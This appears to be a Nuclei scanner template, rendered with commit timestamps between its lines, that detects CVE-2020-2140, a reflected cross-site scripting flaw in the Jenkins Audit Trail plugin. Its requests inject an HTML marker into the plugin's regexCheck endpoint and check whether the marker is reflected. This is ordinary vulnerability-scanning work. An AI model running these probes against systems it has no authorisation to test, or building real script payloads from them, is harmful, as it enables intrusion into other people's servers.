2021-01-02 04:56:15 +00:00
id : CVE-2020-2140
2022-04-22 10:38:41 +00:00
2020-08-30 17:42:46 +00:00
info :
2022-05-09 16:12:52 +00:00
name : Jenkin Audit Trail <=3.2 - Cross-Site Scripting
2022-04-22 10:38:41 +00:00
author : j3ssie/geraldino2
2020-08-30 17:42:46 +00:00
severity : medium
2022-05-09 16:12:52 +00:00
description : Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://www.jenkins.io/security/advisory/2020-03-09/
2022-05-09 16:12:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-2140
2022-05-17 09:18:12 +00:00
- https://jenkins.io/security/advisory/2020-03-09/#SECURITY-1722
- http://www.openwall.com/lists/oss-security/2020/03/09/1
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-2140
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,jenkins,xss,plugin
2020-08-31 07:38:04 +00:00
2020-08-30 17:42:46 +00:00
requests :
2020-08-31 07:38:04 +00:00
- method : GET
path :
2020-09-04 05:55:13 +00:00
- "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"
- "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"
2020-08-31 07:38:04 +00:00
matchers-condition : and
matchers :
- type : word
2020-08-30 17:42:46 +00:00
words :
- <h1>sample
2020-08-31 07:38:04 +00:00
part : body
2020-12-13 19:24:23 +00:00
- type : word
words :
- "text/html"
part : header
2020-08-31 07:38:04 +00:00
- type : status
status :
2022-01-04 19:34:16 +00:00
- 200
2022-05-09 16:12:52 +00:00
# Enhanced by mp on 2022/05/04